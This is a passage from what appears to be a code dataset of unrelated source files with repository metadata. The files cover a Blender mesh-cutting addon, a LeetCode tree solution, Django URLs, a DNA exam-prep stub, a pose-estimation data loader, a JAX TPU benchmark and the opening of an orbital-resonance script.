multifile import register_class, topbar_mt_app_system_add\nfrom mathutils import Vector\nimport bmesh\nfrom math import sin, cos, pi\n\n\nBLACK = Vector((0, 0, 0, 1))\nRED = Vector((1, 0, 0, 1))\nGREEN = Vector((0, 1, 0, 1))\nBLUE = Vector((0, 0, 1, 1))\nALPHA = Vector((0, 0, 0, 1))\n\n\n\n\ndef cut(context, points, thickness=0.0001, distance_multiplier=10, cyclic=True):\n origin = screen_space_to_3d((0, 0), 0, context)\n dist = context.region_data.view_distance\n end = context.space_data.clip_end\n bm = bmesh.new()\n verts = []\n for point in points:\n p1 = screen_space_to_3d(point, 1, context)\n p2 = screen_space_to_3d(point, dist * distance_multiplier, context)\n verts.append((bm.verts.new(p1), bm.verts.new(p2)))\n\n for i in range(len(verts) - 1):\n a, b = verts[i]\n c, d = verts[i + 1]\n bm.faces.new((a, b, d, c))\n\n if cyclic and len(points) > 2:\n a, b = verts[0]\n c, d = verts[-1]\n bm.faces.new((a, b, d, c))\n\n bmesh.ops.recalc_face_normals(bm, faces=bm.faces)\n bmesh.ops.solidify(bm, geom=list(bm.faces), thickness=thickness)\n bmesh.ops.recalc_face_normals(bm, faces=bm.faces)\n mesh = bpy.data.meshes.new(name='cuter_mesh')\n bm.to_mesh(mesh)\n cuter = bpy.data.objects.new(name='cuter_object', object_data=mesh)\n context.scene.collection.objects.link(cuter)\n\n for ob in list(context.view_layer.objects.selected):\n context.view_layer.objects.active = ob\n md = ob.modifiers.new(type='BOOLEAN', name='Cut')\n md.object = cuter\n md.operation = 'DIFFERENCE'\n bpy.ops.object.modifier_apply(modifier=md.name)\n bm = bmesh.new()\n bm.from_mesh(ob.data)\n bmesh.ops.holes_fill(bm, edges=bm.edges)\n bmesh.ops.triangulate(\n bm, faces=[face for face in bm.faces if len(face.verts) > 4])\n bm.to_mesh(ob.data)\n bpy.ops.object.mode_set(mode='EDIT')\n bpy.ops.mesh.select_all(action='SELECT')\n bpy.ops.mesh.separate(type='LOOSE')\n bpy.ops.object.mode_set(mode='OBJECT')\n\n bpy.data.objects.remove(cuter)\n bpy.data.meshes.remove(mesh)\n\n\ndef lerp(a, b, t):\n return a + (b - a) * t\n\n\ndef bezier_interpolate(a, b, c, d, t):\n # todo: optimize later :/\n ab, bc, cd = lerp(a, b, t), lerp(b, c, t), lerp(c, d, t)\n abbc = lerp(ab, bc, t)\n bccd = lerp(bc, cd, t)\n return lerp(abbc, bccd, t)\n\n\ndef bezier_curve_points(a, b, c, d, resolution):\n for i in range(resolution):\n yield bezier_interpolate(a, b, c, d, i / resolution)\n\n\nclass SlashToolBase:\n ortho_vecs = (Vector((0, 1)),\n Vector((1, 0)),\n Vector((1, 1)),\n Vector((1, -1)))\n\n def __init__(self):\n self.points = []\n self.cyclic = False\n self.orthogonal = False\n self.done = False\n\n def update(self):\n pass\n\n def ortho_project(self, mouse_co):\n if not self.points:\n return mouse_co\n\n vec = mouse_co - self.points[-1]\n return max((vec.project(orth) for orth in self.ortho_vecs), key=lambda v: v.dot(vec)) + self.points[-1]\n\n def grab_mode(self, mouse_co):\n\n old_points = self.points\n while True:\n new_co = yield\n self.points = [pt + new_co - mouse_co for pt in old_points]\n\n def on_click(self, mouse_co):\n pass\n\n def on_drag(self, mouse_co):\n pass\n\n def on_mousemove(self, mouse_co):\n pass\n\n def on_enter(self, mouse_co):\n self.done = True\n\n def on_wheel(self, dir):\n pass\n\n def draw(self, draw_2d, mouse_co):\n raise\n\n def undo(self, mouse_co):\n pass\n\n def cut(self, context, thickness=0.0001):\n cut(context, self.points, thickness, 50, self.cyclic)\n\n\nclass PolyCut(SlashToolBase):\n min_point_dist = 10\n\n def on_drag(self, mouse_co):\n if self.points:\n d = (mouse_co - self.points[-1]).length\n if d > 
self.min_point_dist * 2:\n self.points.append(0.5 * (mouse_co + self.points[-1]))\n else:\n self.points.append(mouse_co)\n\n def on_click(self, mouse_co):\n if self.points:\n end1 = self.points[0]\n end2 = self.points[-1]\n\n if (end1 - mouse_co).length < (end2 - mouse_co).length:\n closest_end = end1\n self.cyclic = True\n else:\n closest_end = end2\n self.cyclic = False\n\n d = (mouse_co - closest_end).length\n if d <= self.min_point_dist:\n self.done = True\n return\n\n self.points.append(mouse_co)\n\n def undo(self, mouse_co):\n if self.points:\n self.points.pop(-1)\n\n def draw(self, draw_2d, mouse_co):\n if len(self.points) > 1:\n for i in range(len(self.points) - 1):\n p1 = self.points[i]\n p2 = self.points[i + 1]\n draw_2d.add_line(p1, p2, color_a=BLACK)\n\n draw_2d.add_circle(mouse_co, 3, 16, RED)\n\n if self.points:\n draw_2d.add_line(self.points[-1], mouse_co, color_a=(1, 0.5, 0, 1))\n\n draw_2d.add_circle(\n self.points[-1], self.min_point_dist, 10, color=(1, 0, 0, 0.5))\n draw_2d.add_circle(\n self.points[0], self.min_point_dist, 10, color=(0, 0.2, 1, 0.5))\n\n end1 = self.points[0]\n end2 = self.points[-1]\n\n if (end1 - mouse_co).length < (end2 - mouse_co).length:\n closest_end = end1\n color = (0, 0.2, 1, 1)\n else:\n closest_end = end2\n color = (1, 0.2, 0, 1)\n\n d = (mouse_co - closest_end).length\n if d <= self.min_point_dist:\n draw_2d.add_text('click to cut', mouse_co +\n Vector((10, 10)), color=color, size=20)\n\n\nclass EllipseCut(SlashToolBase):\n\n resolution = 20\n\n def cut(self, context, thickness=0.0001):\n cut(context, list(self.ellipse_points(None)), thickness, 50, True)\n\n def ortho_project(self, mouse_co):\n if not self.points:\n return mouse_co\n\n if len(self.points) == 2:\n u = self.points[1] - self.points[0]\n u = u.yx\n u.x *= -1\n\n ortho_vecs = [u]\n\n else:\n ortho_vecs = self.ortho_vecs\n\n vec = mouse_co - self.points[0]\n return max((vec.project(orth) for orth in ortho_vecs), key=lambda v: v.dot(vec)) + self.points[0]\n\n def on_click(self, mouse_co):\n self.points.append(mouse_co)\n\n if len(self.points) == 3:\n self.done = True\n\n def on_wheel(self, dir):\n self.resolution += dir\n self.resolution = max(self.resolution, 1)\n\n def ellipse_points(self, mouse_co):\n n = len(self.points)\n if 1 <= n <= 3:\n if n == 1:\n u = mouse_co - self.points[0]\n v = u.yx\n v.x *= -1\n\n elif n == 2:\n u = self.points[1] - self.points[0]\n v = (mouse_co - self.points[0])\n\n elif n == 3:\n u = self.points[1] - self.points[0]\n v = self.points[2] - self.points[0]\n\n for i in range(self.resolution):\n a = (i * 2 * pi) / self.resolution\n\n yield u * sin(a) + v * cos(a) + self.points[0]\n\n def undo(self, mouse_co):\n if self.points:\n self.points.pop(-1)\n\n def draw(self, draw_2d, mouse_co):\n\n ellipse = list(self.ellipse_points(mouse_co))\n\n draw_2d.add_line_loop(ellipse, BLACK, cyclic=True)\n\n n = len(self.points)\n\n if n >= 1:\n draw_2d.add_circle(self.points[0], 3, 16, RED)\n\n if n >= 2:\n draw_2d.add_circle(self.points[1], 3, 16, GREEN)\n\n if n >= 3:\n draw_2d.add_circle(self.points[2], 3, 16, BLUE)\n\n if n < 3:\n mouse_color = (RED, GREEN, BLUE)[n]\n draw_2d.add_circle(mouse_co, 3, 16, mouse_color)\n\n\nclass RectangleCut(SlashToolBase):\n\n def rectangle_points(self, a, b):\n x_min = min(a.x, b.x)\n x_max = max(a.x, b.x)\n y_min = min(a.y, b.y)\n y_max = max(a.y, b.y)\n\n return [Vector((x_min, y_min)), Vector((x_max, y_min)),\n Vector((x_max, y_max)), Vector((x_min, y_max))]\n\n def on_click(self, mouse_co):\n 
self.points.append(mouse_co)\n\n if len(self.points) == 2:\n self.done = True\n\n def undo(self, mouse_co):\n if self.points:\n self.points.pop(-1)\n\n def draw(self, draw_2d, mouse_co):\n\n n = len(self.points)\n\n if n == 0:\n draw_2d.add_circle(mouse_co, 3, 16, RED)\n points = None\n\n elif n == 1:\n draw_2d.add_circle(self.points[0], 3, 16, RED)\n draw_2d.add_circle(mouse_co, 3, 16, GREEN)\n points = self.rectangle_points(self.points[0], mouse_co)\n\n elif n == 2:\n draw_2d.add_circle(self.points[0], 3, 16, RED)\n draw_2d.add_circle(self.points[1], 3, 16, GREEN)\n points = self.rectangle_points(self.points[0], self.points[1])\n\n if points:\n draw_2d.add_line_loop(points, BLACK, cyclic=True)\n\n def cut(self, context, thickness=0.0001):\n cut(context, self.rectangle_points(\n self.points[0], self.points[1]), thickness, 50, cyclic=True)\n\n\n\nclass SplineCut(SlashToolBase):\n\n resolution = 10\n confirm_dist = 10\n\n def on_click(self, mouse_co):\n if self.points:\n d = (self.points[-1] - mouse_co).length\n d1 = (self.points[0] - mouse_co).length\n\n if min(d, d1) < self.confirm_dist:\n self.done = True\n if d1 < d:\n self.cyclic = True\n\n else:\n self.cyclic = False\n return\n\n self.points.append(mouse_co)\n\n def on_enter(self, mouse_co):\n self.points.append(mouse_co)\n self.done = True\n\n def on_wheel(self, dir):\n self.resolution += dir\n self.resolution = max(self.resolution, 1)\n\n def spline_points(self, points, resolution, cyclic=False):\n\n if len(points) <= 2:\n return points\n\n if cyclic:\n points = [points[-1], *points, points[0], points[1]]\n\n controll_points = self.auto_bezier_control_points(points)\n new_points = []\n\n for i in range(len(controll_points) // 3):\n i *= 3\n for p in bezier_curve_points(*controll_points[i:i + 4], resolution):\n new_points.append(p)\n\n\n if cyclic:\n new_points = new_points[resolution: -resolution]\n\n else:\n new_points.append(controll_points[-1])\n\n\n return new_points\n\n def auto_bezier_control_points(self, points):\n\n if len(points) < 3:\n return points\n\n new_points = [points[0], points[0]]\n\n for i in range(len(points) - 2):\n i += 1\n\n da = points[i - 1] - points[i]\n db = points[i + 1] - points[i]\n n = da.normalized() + db.normalized()\n if n.length_squared == 0:\n n = da.yx\n n.x *= -1\n\n da -= da.project(n)\n db -= db.project(n)\n\n new_points.append(da * 0.42 + points[i])\n new_points.append(points[i])\n new_points.append(db * 0.42 + points[i])\n\n new_points.append(points[-1])\n new_points.append(points[-1])\n return new_points\n\n def draw(self, draw_2d, mouse_co):\n\n d = float('inf')\n d1 = float('inf')\n if self.points:\n d = (self.points[-1] - mouse_co).length\n d1 = (self.points[0] - mouse_co).length\n\n if d1 < d and d1 < self.confirm_dist:\n self.cyclic = True\n else:\n self.cyclic = False\n\n draw_2d.add_circle(self.points[0], self.confirm_dist, 16, GREEN)\n draw_2d.add_circle(self.points[-1], self.confirm_dist, 16, RED)\n\n if min(d, d1) < self.confirm_dist:\n draw_2d.add_text('click to cut', mouse_co + Vector((10, 10)), color=RED, size=20)\n\n if min(d, d1) < self.confirm_dist:\n points = self.spline_points(self.points, self.resolution, self.cyclic)\n else:\n points = self.spline_points(self.points + [mouse_co], self.resolution, self.cyclic)\n\n draw_2d.add_line_loop(points, BLACK, self.cyclic)\n\n for point in self.points:\n draw_2d.add_circle(point, 3, 16, RED)\n\n draw_2d.add_circle(mouse_co, 3, 16, GREEN)\n\n def undo(self, mouse_co):\n if self.points:\n self.points.pop(-1)\n\n def cut(self, 
context, thickness=0.0001):\n cut(context, self.spline_points(self.points, self.resolution, self.cyclic), thickness, 50, self.cyclic)\n\nlast_tool = PolyCut\n\n@topbar_mt_app_system_add\n@register_class\nclass SlashCutter(InteractiveOperator):\n bl_idname = 'sculpt_tool_kit.slash'\n bl_label = 'Slash Cutter'\n\n\n def loop(self, context):\n global last_tool\n tool = last_tool()\n\n while True:\n event = yield {'RUNNING_MODAL'}\n self.draw_2d.clear()\n\n\n if event.ctrl:\n mouse_co = tool.ortho_project(self.mouse_co)\n tool.orthogonal = True\n else:\n mouse_co = self.mouse_co\n tool.orthogonal = False\n\n if not self.wheel == 0:\n tool.on_wheel(self.wheel)\n\n if event.type == 'D':\n tool = PolyCut()\n last_tool = PolyCut\n\n elif event.type == 'E':\n tool = EllipseCut()\n last_tool = EllipseCut\n\n elif event.type == 'S':\n tool = SplineCut()\n last_tool = SplineCut\n\n elif event.type == 'R':\n tool = RectangleCut()\n last_tool = RectangleCut\n\n elif event.type == 'PAGE_UP' and event.value == 'PRESS':\n tool.on_wheel(1)\n\n elif event.type == 'PAGE_DOWN' and event.value == 'PRESS':\n tool.on_wheel(-1)\n\n elif event.type == 'LEFTMOUSE' and event.value == 'PRESS':\n tool.on_click(mouse_co)\n\n elif event.type == 'Z' and event.ctrl and event.value == \"PRESS\":\n tool.undo(mouse_co)\n\n elif event.type == 'MOUSEMOVE' and self.lmb:\n tool.on_drag(mouse_co)\n\n elif event.type == 'MOUSEMOVE':\n tool.on_mousemove(mouse_co)\n\n elif event.type == 'RET':\n tool.on_enter(mouse_co)\n\n elif event.type == 'G' and event.value == 'PRESS':\n grab_mode = tool.grab_mode(mouse_co)\n next(grab_mode)\n while True:\n grab_mode.send(self.mouse_co)\n self.draw_2d.clear()\n tool.draw(self.draw_2d, mouse_co)\n\n event = yield {'RUNNING_MODAL'}\n mouse_co = self.mouse_co\n if event.type == 'RET' or self.lmb:\n break\n\n elif event.type == 'ESC':\n return {'CANCELLED'}\n\n help_text = f'''\n Current tool: {tool.__class__.__name__}\n D: PolyCut, E: EllipseCut, S: SplineCut, R: RectangleCut\n orthogonal mode (ctrl): {'enabled' if tool.orthogonal else 'disabled'}\n undo: (ctrl + Z)\n change resolution: wheel +/-\n '''\n\n for i, line in enumerate(reversed(help_text.split('\\n'))):\n self.draw_2d.add_text(line, Vector((10, i*25)), 20, Vector((0.9, 0.8, 0, 1)))\n\n tool.update()\n tool.draw(self.draw_2d, mouse_co)\n\n if tool.done:\n tool.cut(context)\n return {'FINISHED'}\n","repo_name":"jeacom25b/sculptkt-for-2-8","sub_path":"slash_cut.py","file_name":"slash_cut.py","file_ext":"py","file_size_in_byte":16030,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"35"} +{"seq_id":"40526983937","text":"#\n# [199] Binary Tree Right Side View\n#\n# https://leetcode.com/problems/binary-tree-right-side-view/description/\n#\n# algorithms\n# Medium (44.05%)\n# Total Accepted: 122.9K\n# Total Submissions: 279K\n# Testcase Example: '[1,2,3,null,5,null,4]'\n#\n# Given a binary tree, imagine yourself standing on the right side of it,\n# return the values of the nodes you can see ordered from top to bottom.\n# \n# Example:\n# \n# \n# Input: [1,2,3,null,5,null,4]\n# Output: [1, 3, 4]\n# Explanation:\n# \n# ⁠ 1 <---\n# ⁠/ \\\n# 2 3 <---\n# ⁠\\ \\\n# ⁠ 5 4 <---\n# \n# \n#\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def rightSideView(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[int]\n \"\"\"\n if root == None:\n \treturn []\n queue = [(root, 0)]\n series = []\n 
while queue != []:\n        \thead = queue[0]\n        \tseries.append(head)\n        \tqueue.pop(0)\n        \tif head[0].right != None:\n        \t\tqueue.append((head[0].right, head[1] + 1))\n        \tif head[0].left != None:\n        \t\tqueue.append((head[0].left, head[1] + 1))\n        ans = []\n        level = 0\n        for tup in series:\n        \tif tup[1] == level:\n        \t\tans.append(tup[0].val)\n        \t\tlevel += 1\n        \telse:\n        \t\tcontinue\n        return ans\n\n        \n","repo_name":"Zihua-Liu/LeetCode","sub_path":"199/199.binary-tree-right-side-view.python3.py","file_name":"199.binary-tree-right-side-view.python3.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33521139777","text":"\"\"\"CMS urls.\"\"\"\nfrom django.urls import path\nfrom . import views\n\napp_name = 'cms'\n\nurlpatterns = [\n\n    path(\n        '',\n        views.ImageCreate.as_view(),\n        name='home'\n    ),\n    path(\n        '<int:pk>/',\n        views.ImageDetailView.as_view(),\n        name='image-detail'\n    ),\n    path(\n        '<int:pk>/export/xls/',\n        views.export_results_xls,\n        name='export_results_xls',\n    ),\n\n]\n","repo_name":"vinsmokemau/OCR","sub_path":"cms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36892145677","text":"\"\"\"\n@author: Jianan Zhen\n@contact: jnzhen99@163.com\n\"\"\"\nimport copy\nimport cv2\nimport json\nimport numpy as np\nimport os.path as osp\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom dataset.ImageAugmentation import (aug_croppad, aug_flip, aug_rotate, aug_scale)\nfrom dataset.representation import generate_heatmap, generate_paf, generate_rdepth\n\n\nclass JointDataset(Dataset):\n    def __init__(self, cfg, stage, transform=None, with_augmentation=False, with_mds=False):\n        self.stage = stage\n        \"\"\"\n        train: provide training data for training\n        test: provide test data for test\n        generation: provide training data for inference --> the input to RefineNet\n        \"\"\"\n        assert self.stage in ('train', 'test', 'generation')\n\n        self.transform = transform\n\n        self.train_data = list()\n        self.val_data = list()\n        DATASET = cfg.dataset\n        if self.stage == 'train':\n            # choose coco + specific 3d dataset for training together\n            with open(DATASET.COCO_JSON_PATH) as data_file:\n                data_this = json.load(data_file)\n                data = data_this['root']\n            for data_name in DATASET.USED_3D_DATASETS:  # 'MUCO', 'CMUP', 'H36M'\n                with open(eval('DATASET.%s_JSON_PATH'%(data_name))) as data_file:\n                    data_this = json.load(data_file)\n                    data = data_this['root'] + data\n        elif self.stage == 'generation':\n            data = []\n            for data_name in DATASET.USED_3D_DATASETS: \n                with open(eval('DATASET.%s_JSON_PATH'%(data_name))) as data_file:\n                    data_this = json.load(data_file)\n                    data = data_this['root'] + data\n        else:\n            with open(cfg.TEST.JSON_PATH) as data_file:\n                data_this = json.load(data_file)\n                data = data_this['root']\n\n        for i in range(len(data)):\n            if data[i]['isValidation'] != 0:\n                self.val_data.append(data[i])\n            else:\n                self.train_data.append(data[i])\n\n        self.input_shape = DATASET.INPUT_SHAPE\n        self.output_shape = DATASET.OUTPUT_SHAPE\n        self.stride = DATASET.STRIDE\n\n        # data root path\n        self.test_root_path = cfg.TEST.ROOT_PATH\n        self.root_path = {}\n        for dname in (['COCO'] + DATASET.USED_3D_DATASETS):  # 'MUCO', 'CMUP', 'H36M'\n            self.root_path[dname] = eval('DATASET.%s_ROOT_PATH'%(dname))\n\n        # keypoints information\n        self.root_idx = DATASET.ROOT_IDX\n        self.keypoint_num = DATASET.KEYPOINT.NUM\n        self.gaussian_kernels = 
DATASET.TRAIN.GAUSSIAN_KERNELS\n self.paf_num = DATASET.PAF.NUM\n self.paf_vector = DATASET.PAF.VECTOR\n self.paf_thre = DATASET.PAF.LINE_WIDTH_THRE\n\n # augmentation information\n self.with_augmentation = with_augmentation\n self.params_transform = dict()\n self.params_transform['crop_size_x'] = DATASET.INPUT_SHAPE[1]\n self.params_transform['crop_size_y'] = DATASET.INPUT_SHAPE[0]\n self.params_transform['center_perterb_max'] = DATASET.TRAIN.CENTER_TRANS_MAX\n self.params_transform['max_rotate_degree'] = DATASET.TRAIN.ROTATE_MAX\n self.params_transform['flip_prob'] = DATASET.TRAIN.FLIP_PROB\n self.params_transform['flip_order'] = DATASET.KEYPOINT.FLIP_ORDER\n self.params_transform['stride'] = DATASET.STRIDE\n self.params_transform['scale_max'] = DATASET.TRAIN.SCALE_MAX\n self.params_transform['scale_min'] = DATASET.TRAIN.SCALE_MIN\n\n self.with_mds = with_mds\n self.max_people = cfg.DATASET.MAX_PEOPLE\n\n def __len__(self):\n if self.stage == 'train' or self.stage == 'generation':\n return len(self.train_data)\n else: # 'test'\n return len(self.val_data)\n\n def get_anno(self, meta_data):\n anno = dict()\n anno['dataset'] = meta_data['dataset'].upper()\n anno['img_height'] = int(meta_data['img_height'])\n anno['img_width'] = int(meta_data['img_width'])\n\n anno['isValidation'] = meta_data['isValidation']\n anno['bodys'] = np.asarray(meta_data['bodys'])\n anno['center'] = np.array([anno['img_width']//2, anno['img_height']//2])\n return anno\n\n def remove_illegal_joint(self, meta):\n crop_x = int(self.params_transform['crop_size_x'])\n crop_y = int(self.params_transform['crop_size_y'])\n for i in range(len(meta['bodys'])):\n mask_ = np.logical_or.reduce((meta['bodys'][i][:, 0] >= crop_x,\n meta['bodys'][i][:, 0] < 0,\n meta['bodys'][i][:, 1] >= crop_y,\n meta['bodys'][i][:, 1] < 0))\n\n meta['bodys'][i][mask_ == True, 3] = 0\n return meta\n\n def __getitem__(self, index):\n if self.stage == 'train' or self.stage == 'generation':\n data = copy.deepcopy(self.train_data[index])\n else:\n data = copy.deepcopy(self.val_data[index])\n\n meta_data = self.get_anno(data)\n\n if self.stage not in ['train', 'generation']:\n root_path = self.test_root_path\n else:\n root_path = self.root_path[meta_data['dataset']]\n\n img = cv2.imread(osp.join(root_path, data['img_paths']), cv2.IMREAD_COLOR)\n\n if self.with_augmentation:\n meta_data, img = aug_rotate(meta_data, img, self.params_transform)\n else:\n self.params_transform['center_perterb_max'] = 0\n\n if meta_data['dataset'] == 'COCO':\n meta_data, img = aug_croppad(meta_data, img, self.params_transform, self.with_augmentation)\n else:\n meta_data, img = aug_croppad(meta_data, img, self.params_transform, False)\n\n if self.with_augmentation:\n meta_data, img = aug_flip(meta_data, img, self.params_transform)\n\n meta_data = self.remove_illegal_joint(meta_data)\n\n if self.transform:\n img = self.transform(img)\n else:\n img = img.transpose((2, 0, 1)).astype(np.float32)\n img = torch.from_numpy(img).float()\n \n if self.stage in ['test', 'generation']:\n bodys = np.zeros((self.max_people, self.keypoint_num, len(meta_data['bodys'][0][0])), np.float)\n bodys[:len(meta_data['bodys'])] = np.asarray(meta_data['bodys'])\n img_path = data['img_paths']\n return img, torch.from_numpy(bodys).float(), img_path, {'scale': meta_data['scale'],\n 'img_width': meta_data['img_width'],\n 'img_height': meta_data['img_height'],\n 'net_width': self.params_transform['crop_size_x'],\n 'net_height': self.params_transform['crop_size_y']}\n # generate labels\n valid = 
np.ones((self.keypoint_num + self.paf_num*3, 1), np.float)\n if meta_data['dataset'] == 'COCO':\n # coco has no headtop annotation\n valid[1, 0] = 0 \n # pafs of headtop and neck\n valid[self.keypoint_num, 0] = 0 \n valid[self.keypoint_num+1, 0] = 0\n # relative depth\n valid[self.keypoint_num + self.paf_num*2:, 0] = 0\n\n labels_num = len(self.gaussian_kernels)\n labels = np.zeros((labels_num, self.keypoint_num + self.paf_num*3, *self.output_shape))\n for i in range(labels_num):\n # heatmaps\n labels[i][:self.keypoint_num] = generate_heatmap(meta_data['bodys'], self.output_shape, self.stride, \\\n self.keypoint_num, kernel=self.gaussian_kernels[i])\n # pafs + relative depth\n labels[i][self.keypoint_num:] = generate_paf(meta_data['bodys'], self.output_shape, self.params_transform, \\\n self.paf_num, self.paf_vector, max(1, (3-i))*self.paf_thre, self.with_mds)\n # root depth\n labels_rdepth = generate_rdepth(meta_data, self.stride, self.root_idx, self.max_people)\n \n labels = torch.from_numpy(labels).float()\n labels_rdepth = torch.from_numpy(labels_rdepth).float()\n valid = torch.from_numpy(valid).float()\n\n return img, valid, labels, labels_rdepth\n\n\n\n\n\n\n\n\n","repo_name":"zju3dv/SMAP","sub_path":"dataset/base_dataset.py","file_name":"base_dataset.py","file_ext":"py","file_size_in_byte":8504,"program_lang":"python","lang":"en","doc_type":"code","stars":236,"dataset":"github-code","pt":"35"} +{"seq_id":"33846320435","text":"def hamming(codon1, codon2):\n '''\n >>> hamming('TTCAT', 'TTCAT')\n 0\n >>> hamming('TTCAT', 'TTGAT')\n 1\n >>> hamming('TTCAT', 'GAGGA')\n 5\n >>> hamming('TTCAT', 'TTT')\n Traceback (most recent call last):\n AssertionError: strings should have equal length\n '''\n count = 0\n if len(codon1) == len(codon2):\n for i in range(len(codon1)):\n if codon1[i] != codon2[i]:\n count += 1\n return count\n raise AssertionError('strings should have equal length')\ndef complement(codon):\n '''\n >>> complement('TTCAT')\n 'ATGAA'\n >>> complement('TTGAT')\n 'ATCAA'\n >>> complement('GAGGA')\n 'TCCTC'\n '''\n complementList = []\n reverse = codon[::-1]\n for code in reverse:\n if code == 'A':\n complementList.append('T')\n if code == 'G':\n complementList.append('C')\n if code == 'T':\n complementList.append('A')\n if code == 'C':\n complementList.append('G')\n return ''.join(complementList)\n\ndef normalform(codon):\n '''\n >>> normalform('TTCAT')\n 'ATGAA'\n >>> normalform('TTGAT')\n 'ATCAA'\n >>> normalform('GAGGA')\n 'GAGGA'\n '''\n if sorted(codon) == codon:\n return complement(codon)\n else:\n return codon\n\ndef occurrences(reads):\n '''\n >>> reads = ['TCATC', 'TTCAT', 'TCATC', 'TGAAA', 'GAGGA', 'TTTCA', 'ATCAA', 'TTGAT', 'AGGCT']\n >>> occurrences(reads)\n {'GAGGA': 1, 'ATGAA': 1, 'TGAAA': 2, 'GATGA': 2, 'AGCCT': 1, 'ATCAA': 2}\n >>> reads = ['GATTA', 'GATTA', 'TAATC', 'GAATC', 'GATTA', 'TAAGC', 'TAATA']\n >>> occurrences(reads)\n {'GATTA': 4, 'TAATA': 1, 'GCTTA': 1, 'GAATC': 1}\n '''\n\ndef errors(reads):\n '''\n >>> reads = ['TCATC', 'TTCAT', 'TCATC', 'TGAAA', 'GAGGA', 'TTTCA', 'ATCAA', 'TTGAT', 'AGGCT']\n >>> errors(reads)\n ({'AGGCT'}, [('GAGGA', 'GATGA'), ('TTCAT', 'TTGAT')])\n >>> reads = ['GATTA', 'GATTA', 'TAATC', 'GAATC', 'GATTA', 'TAAGC', 'TAATA']\n >>> errors(reads)\n (set(), [('GAATC', 'TAATC'), ('TAAGC', 'TAATC'), ('TAATA', 'TAATC')])\n '''","repo_name":"isk02206/python","sub_path":"informatics/BA_1 2017-2018/exam prep/Error correction in reads.py","file_name":"Error correction in 
reads.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29898694410","text":"import os\n\nimport haliax as hax\nimport jax\nimport jax.numpy as jnp\nimport jax.random as jax_rand\nfrom haliax import NamedArray\nfrom jax.nn import one_hot\nfrom jax.sharding import Mesh\nfrom jax_smi import initialise_tracking\nfrom optax import softmax_cross_entropy\nfrom tqdm import tqdm\n\nimport src.data.transforms as T\nfrom src.data.loader import DLConfig, SSV2\nfrom src.model.lq import LQViTConfig, LQViT\n\ncompute_axis_mapping = {'batch': 'data'}\nparam_axis_mapping = {'embed': 'data'}\nmesh = Mesh(jax.local_devices(backend='tpu'), 'data')\n\n\nTRAIN_AUG = T.Sequential([\n T.TrivialAugment(),\n T.Normalize().astype(jnp.bfloat16),\n])\n\n@jax.jit\ndef collate_put(cls, vid):\n cls = hax.named(jnp.stack(cls), 'batch')\n vid = hax.named(jnp.stack(vid), ('batch', 'temporal', 'channels', 'height', 'width'))\n with mesh:\n cls = hax.shard_with_axis_mapping(cls, compute_axis_mapping)\n vid = hax.shard_with_axis_mapping(vid, compute_axis_mapping)\n return cls, vid\n\n\n@hax.named_jit(donate_args=(False, True, True))\ndef cross_entropy(model: LQViT, targets: NamedArray, x: NamedArray, *, key, num_classes: 174) -> NamedArray:\n with hax.axis_mapping(compute_axis_mapping):\n raw_logits = model(x, key=key)\n targets = targets.astype(jnp.int32)\n return softmax_cross_entropy(\n raw_logits.array,\n one_hot(targets.array, num_classes)\n ).mean()\n\n\nkey = jax_rand.PRNGKey(0)\n\nm_cfg = LQViTConfig(n_classes=174)\nmodel = hax.shard_with_axis_mapping(\n LQViT.init(m_cfg, key=key).astype(jnp.bfloat16),\n param_axis_mapping,\n mesh=mesh,\n)\n\nconfig = DLConfig(\n data_loc='gs://redunmin',\n collate_put=collate_put,\n transforms={\n 'train': TRAIN_AUG\n },\n batch_size=32,\n)\nloader = SSV2(config, key=key)\nloader.setup('train')\ninitialise_tracking()\nlog_path = f'{os.environ[\"HOME\"]}/tmp/tensorboard'\nos.makedirs(log_path, exist_ok=True)\nwith jax.profiler.trace(log_path):\n for i, x in enumerate(tqdm(loader.train_dataloader())):\n with mesh:\n jax.block_until_ready(cross_entropy(model, x[0], x[1], key=key, num_classes=174))\n #jax.block_until_ready(x)\n","repo_name":"leifu1128/RedunMin","sub_path":"tests/ssv2_bench.py","file_name":"ssv2_bench.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71085164262","text":"\nfrom re import M\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy.optimize as opt\nfrom sympy import Point, Line\nfrom scipy import interpolate\nimport sys\nfrom gr_wrapper import ckerr_minverse, ckerr_minv2omega, ckerr_eql2j, ckerr_j2eql\nimport os \nimport math\n\n\n\n\n\"\"\"\nHello!\n\nAfter you simulate all the orbits and put them in a file,\nwe use this code to generate a list of all potential resonances\nfor delta_J to determine the strength of.\n\nInputs: mu_inner, mu_outer, M, astar, file counter\n\nOutputs (by column): resonance counter, file counter, \nresonance time, omega_inner_dot, omega_outer_dot, \nmu_inner, mu_outer, gamma, m, n_inner, k_inner, n_outer, \nk_outer, J_r_inner, J_theta_inner, J_phi_inner, J_r_outer, \nJ_theta_outer, J_phi_outer, inner inclination, inner periapse, \ninner apoapse, outer inclination, outer periapse, outer apoapse\n\"\"\"\n\n\n\n#Note that in the paper, we chose 0.00001, 0.00001, 1, 0.9, and ran over 50 files\nprint(\"Enter the EMRI 
